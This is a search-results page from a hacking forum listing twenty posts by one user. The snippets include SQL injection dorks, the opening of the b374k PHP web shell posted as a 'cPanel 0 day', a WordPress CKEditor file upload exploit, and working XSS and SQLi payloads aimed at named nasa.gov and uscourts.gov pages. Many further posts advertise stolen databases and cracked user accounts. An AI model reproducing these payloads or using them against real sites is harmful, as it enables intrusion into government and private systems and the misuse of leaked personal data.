Search results

  1. Tornado

    ARASTAR Sql Injection Vulnerability

    ############################################### Exploit Title: [ aps ARASTAR Sql Vulnerability ] # Google Dork: ["inurl:/about.php?ID=terms#"] # Author.....: [ spy606 ] # Date.......: [ Feb, 16th 20113 ] # Version.....: [ all ] # HoMe ......: [ exeaction team ] # Download ..: [...
  2. Tornado

    cPanel 0 day

    <?php /* b374k 2.2 Jayalah Indonesiaku (c) 2012 http://code.google.com/p/b374k-shell */ error_reporting(0); @set_time_limit(0); $s_name = "b374k"; // shell name $s_ver = "2.2"; // shell ver $s_title = $s_name." ".$s_ver; // shell title $s_pass = ""; // shell password, fill with password...
  3. Tornado

    cPanel 0 day

    <?php /* b374k 2.2 Jayalah Indonesiaku (c) 2012 http://code.google.com/p/b374k-shell */ error_reporting(0); @set_time_limit(0); $s_name = "b374k"; // shell name $s_ver = "2.2"; // shell ver $s_title = $s_name." ".$s_ver; // shell title $s_pass = ""; // shell password, fill with password...
  4. Tornado

    nasa.gov FREE

    https://connect.arc.nasa.gov/p1jngti8c8g/?launcher=false&fcsContent=true&pbMode=normal%22%3E%3Ciframe%20onload%3Dalert%28%22CrackingForums.net%22%29%20%2F%3E
  5. Tornado

    wordpress plugin ckeditor 4.0 0day

    Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit # Exploit-Title: Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit # Date: 2013-02-07 # Author: sk0d # Software-Link: http://downloads.wordpress.org/plugin/ckeditor-for-wordpress.4.0.zip # Version: 4.0 # Category...
  6. Tornado

    vbulletin 4.1.5 attachment SQLI

    examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go...
  7. Tornado

    CyberDBS Full Database

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  8. Tornado

    Last-Gamers Full DB [0XF ONLY]

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  9. Tornado

    wizardforums.com ->- Accounts Cracked

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  10. Tornado

    webpagetest.org Database Dump

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  11. Tornado

    forosdz.info - Topics: 23,646, Posts: 566,796, Members: 23,947

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  12. Tornado

    SocialEngineForum.com Database - 25k + users and all active

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  13. Tornado

    Russian Hacking Forum Database - forum.inattack.ru

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  14. Tornado

    HackHound Database

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  15. Tornado

    Cartown.com Email DB [ EMAIL ONLY ]

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  16. Tornado

    wjunction.com usertables

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  17. Tornado

    Skyll.net Full Database

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  18. Tornado

    breakingr00t.com user accounts cracked

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  19. Tornado

    WHMCS with 16k users

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  20. Tornado

    [SQLi/XSS/CSRF]-www2.vaeb.uscourts.gov/

    Have fun guise :) SQLi: www2.vaeb.uscourts.gov/oz/index.php?t=tinf&id=2340' www2.vaeb.uscourts.gov/oz/supporter/print.php?id=[SQLi] XSS: http://www2.vaeb.uscourts.gov/oz/index.php?t=kbase&pla=%3Cscript%3Ealert(String.fromCharCode(68,%2097,%20114,%20107,%2045,%2088))%3C/script%3E CSRF...
Top Bottom